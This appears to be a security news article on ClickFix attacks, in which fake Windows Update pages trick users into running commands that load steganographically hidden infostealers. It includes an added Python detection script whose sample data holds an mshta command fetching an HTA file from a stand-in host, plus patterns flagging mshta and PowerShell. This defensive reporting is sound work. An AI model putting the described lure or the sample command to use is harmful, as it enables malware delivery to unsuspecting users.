- Fake Windows updates deliver advanced malware hidden in encrypted PNG images
- Hackers trick their victims with update screens that secretly execute malicious commands
- Stego Loader rebuilds malicious payloads from scratch in memory using C# routines
Hackers are increasingly using fake Windows Update screenshots to spread complex malware using social engineering techniques.
ClickFix attacks trick users into running commands in Windows by mimicking legitimate update prompts on full-screen browser pages, Huntress researchers Ben Folland and Anna Pham found.
According to the researchers, in some cases the attackers ask their victims to press certain key combinations, which automatically paste malicious commands into the Windows Run dialog.
Steganography and multi-stage loaders
These commands then trigger the execution of malware, bypassing standard system protections and affecting both individual and enterprise systems.
Malicious payloads are hidden in PNG images using steganography, encrypted with AES, and reconstructed by a .NET assembly called Stego Loader.
This loader extracts shellcode using custom C# routines and repackages it using the donut tool, allowing VBScript, JScript, EXE, DLL, and .NET assembly files to run entirely in memory.
Analysts identified the resulting malware as variants of LummaC2 and Rhadamanthys.
The use of steganography in these attacks shows that malware delivery now extends beyond traditional executables and presents a new challenge for threat detection and incident response teams.
Attackers also use dynamic evasion tactics like Ctrampoline, which calls thousands of empty functions to make analysis difficult.
In October 2025, a variant using the fake Windows Update lure was discovered, and in November law enforcement took down part of the infrastructure through Operation Endgame.
This prevented the final payload from being delivered via malicious domains, although the fake update pages remained active.
The attacks are constantly evolving, alternating between human verification prompts and update animations to trick users into executing commands.
Researchers recommend monitoring process chains for suspicious activity, such as explorer.exe spawning mshta.exe or PowerShell.
Defenders can also check the RunMRU registry key to see which commands have been entered into the Run dialog.
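A defender-side implementation of both checks, added here as an example that is not part of the article or the Huntress research: the process-creation events and RunMRU values are constructed sample data, and the Sysmon-style field names are an assumption.

```python
# Added example: detection logic for the two checks the article recommends,
# run over constructed sample data (not real telemetry from the campaign).
import re

# Child images flagged when spawned directly by explorer.exe
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe"}

def suspicious_process_chains(events):
    """Return process-creation events where explorer.exe spawns mshta.exe or PowerShell.

    `events` are dicts with Sysmon-like keys (assumed): 'parent_image', 'image', 'command_line'.
    """
    hits = []
    for ev in events:
        parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
        child = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent == "explorer.exe" and child in SUSPICIOUS_CHILDREN:
            hits.append(ev)
    return hits

def parse_runmru(values):
    """Return Run-dialog history most-recent-first.

    `values` mirrors HKCU\\...\\Explorer\\RunMRU: 'MRUList' holds the letter order
    (most recent first) and each lettered value stores the command followed by '\\1'.
    """
    entries = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter, "")
        entries.append(raw[:-2] if raw.endswith("\\1") else raw)
    return entries

RUNMRU_PATTERN = re.compile(r"\b(mshta|powershell|pwsh)(\.exe)?\b", re.IGNORECASE)

def suspicious_runmru(values):
    """Return RunMRU commands that invoke mshta or PowerShell."""
    return [cmd for cmd in parse_runmru(values) if RUNMRU_PATTERN.search(cmd)]

# Constructed sample data: one benign child, one explorer->mshta chain, one cmd->powershell chain
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://update.example.invalid/check.hta"},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Get-Date"},
]
# Constructed RunMRU key: 'c' is the most recent entry
SAMPLE_RUNMRU = {"MRUList": "cab", "a": "calc\\1", "b": "notepad\\1",
                 "c": "powershell -w hidden -c \"<constructed placeholder>\"\\1"}

if __name__ == "__main__":
    print(suspicious_process_chains(SAMPLE_EVENTS))
    print(suspicious_runmru(SAMPLE_RUNMRU))
```

On a live host the RunMRU values would be read with winreg or `Get-ItemProperty`; the parsing and matching logic is the same.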
Organizations are advised to combine malware removal methods with antivirus scanning and firewall protection to limit exposure.
Other recommended precautions include disabling the Windows Run dialog where possible and carefully examining image-based payloads.
Companies must consider the risk of attackers weaponizing seemingly legitimate assets such as images and scripts, which makes logging, tracking and forensic analysis difficult.
The campaign also raises concerns about supply chain security and the ability of attackers to exploit trusted update mechanisms as an entry point.